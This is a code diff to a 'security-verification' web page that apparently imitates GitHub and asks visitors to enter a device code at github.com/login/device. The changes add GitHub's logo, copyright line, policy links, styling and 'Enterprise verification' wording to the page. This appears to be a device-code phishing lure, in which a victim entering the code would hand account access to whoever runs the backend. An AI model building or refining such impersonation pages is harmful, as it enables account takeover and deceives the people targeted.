--- a/security-verification/index.html
+++ b/security-verification/index.html
@@ -13,8 +13,9 @@
       display: flex;
       align-items: center;
       justify-content: center;
-      height: 100vh;
+      min-height: 100vh;
       margin: 0;
+      padding-bottom: 100px; /* Space for footer */
     }
     .box {
       background: white;
@@ -44,6 +45,11 @@
       font-weight: bold;
       letter-spacing: 3px;
       margin: 20px 0;
+      background-color: #f6f8fa;
+      border: 1px solid #d0d7de;
+      border-radius: 6px;
+      padding: 16px 24px;
+      color: #1f2328;
     }
     button {
       background-color: #2da44e;
@@ -79,6 +85,45 @@
         content: '...';
       }
     }
+    .footer {
+      position: fixed;
+      bottom: 0;
+      left: 0;
+      right: 0;
+      background-color: #f6f8fa;
+      border-top: 1px solid #d0d7de;
+      padding: 16px 24px;
+      text-align: center;
+    }
+    .footer-links {
+      display: flex;
+      justify-content: center;
+      align-items: center;
+      flex-wrap: wrap;
+      gap: 16px;
+      margin-bottom: 8px;
+      font-size: 12px;
+    }
+    .footer-links a {
+      color: #0969da;
+      text-decoration: none;
+    }
+    .footer-links a:hover {
+      text-decoration: underline;
+    }
+    .footer-copyright {
+      font-size: 12px;
+      color: #656d76;
+      display: flex;
+      justify-content: center;
+      align-items: center;
+      gap: 4px;
+    }
+    .footer-copyright svg {
+      width: 16px;
+      height: 16px;
+      fill: #656d76;
+    }
   </style>
 </head>
 <body>
@@ -113,15 +158,37 @@
       </div>
     </div>
     <div id="code-state" class="hidden">
-      <p>Enter this code at <a href="https://github.com/login/device" target="_blank">github.com/login/device</a>:</p>
+      <div style="margin-bottom: 20px;">
+        <i class="fas fa-check" style="font-size: 48px; color: #2da44e; margin-bottom: 16px;"></i>
+      </div>
+      <h3 style="font-size: 20px; font-weight: 600; color: #1f2328; margin: 0 0 8px 0;">Enterprise verification code ready</h3>
+      <p style="color: #656d76; margin: 0 0 24px 0; font-size: 14px;">Use this code to verify your enterprise organization access:</p>
       <div class="code-box" id="device-code">ABC1-234D</div>
-      <button onclick="window.open('https://github.com/login/device', '_blank')">Authenticate</button>
+      <button onclick="window.open('https://github.com/login/device', '_blank')" style="background-color: #2da44e; color: white; padding: 12px 24px; border: none; border-radius: 6px; cursor: pointer; font-size: 14px; font-weight: 500; margin-top: 20px;">Authenticate with Enterprise GitHub</button>
     </div>
     <div id="error-state" class="hidden">
       <div class="error" id="error-message">Failed to generate device code. Please try again.</div>
       <button onclick="location.reload()">Retry</button>
     </div>
   </div>
+  
+  <footer class="footer">
+    <div class="footer-links">
+      <a href="https://docs.github.com/site-policy/github-terms/github-terms-of-service" target="_blank">Terms</a>
+      <a href="https://docs.github.com/site-policy/privacy-policies/github-privacy-statement" target="_blank">Privacy</a>
+      <a href="https://docs.github.com" target="_blank">Docs</a>
+      <a href="https://github.com/enterprise/contact" target="_blank">Contact GitHub Support</a>
+      <a href="#" onclick="return false;">Manage cookies</a>
+      <a href="https://docs.github.com/site-policy/privacy-policies/github-privacy-statement#github-pages" target="_blank">Do not share my personal information</a>
+    </div>
+    <div class="footer-copyright">
+      <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16">
+        <path d="M8 0c4.42 0 8 3.58 8 8a8.013 8.013 0 0 1-5.45 7.59c-.4.08-.55-.17-.55-.38 0-.27.01-1.13.01-2.2 0-.75-.25-1.23-.54-1.48 1.78-.2 3.65-.88 3.65-3.95 0-.88-.31-1.59-.82-2.15.08-.2.36-1.02-.08-2.12 0 0-.67-.22-2.2.82-.64-.18-1.32-.27-2-.27-.68 0-1.36.09-2 .27-1.53-1.03-2.2-.82-2.2-.82-.44 1.1-.16 1.92-.08 2.12-.51.56-.82 1.28-.82 2.15 0 3.06 1.86 3.75 3.64 3.95-.23.2-.44.55-.51 1.07-.46.21-1.61.55-2.33-.66-.15-.24-.6-.83-1.23-.82-.67.01-.27.38.01.53.34.19.73.9.82 1.13.16.45.68 1.31 2.69.94 0 .67.01 1.3.01 1.49 0 .21-.15.45-.55.38A7.995 7.995 0 0 1 0 8c0-4.42 3.58-8 8-8Z"></path>
+      </svg>
+      © 2024 GitHub, Inc.
+    </div>
+  </footer>
+  
   <script>
     // Configuration - Update this URL to your backend server
     const BACKEND_URL = 'http://localhost:5033';
